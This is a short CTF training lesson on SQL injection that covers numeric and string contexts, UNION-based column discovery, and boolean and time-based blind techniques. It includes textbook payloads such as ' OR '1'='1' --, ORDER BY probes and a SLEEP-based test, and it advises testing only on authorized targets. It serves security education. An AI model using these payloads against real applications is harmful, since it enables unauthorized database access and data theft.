Intermediate Track3 hours
SQL Injection Deep Dive
4 guided sections and curated resources to get you contest-ready.
Lesson Playbook
4 sections1
SQLi in CTFs
SQL injection is a vulnerability where untrusted input changes a SQL query.
In training/CTF apps, SQLi typically appears in:
- login forms
- search queries
- numeric IDs like ?id=123
Only test SQLi in environments you are authorized to test.
2
String vs Number Context
Your payload depends on how the parameter is used.
# Numeric context
?id=1 OR 1=1
# String context
?user=admin' --
?user=' OR '1'='1' --Pro tip: Start with a single quote probe `'` and observe response differences.
3
UNION Pattern
If the app reflects rows in the response, UNION-based extraction is common.
Typical flow:
- determine column count
- find reflected columns
- extract (CTF/sandbox only)
# Find column count
?id=1 ORDER BY 1--
?id=1 ORDER BY 2--
# UNION with NULLs
?id=-1 UNION SELECT NULL,NULL,NULL--4
Blind SQLi
If results aren't reflected, you can still infer information:
- boolean-based: response changes when condition is true
- time-based: response delays when condition is true
# Boolean-based idea
?id=1 AND 1=1
?id=1 AND 1=2
# Time-based idea (MySQL)
?id=1 AND IF(1=1, SLEEP(2), 0)--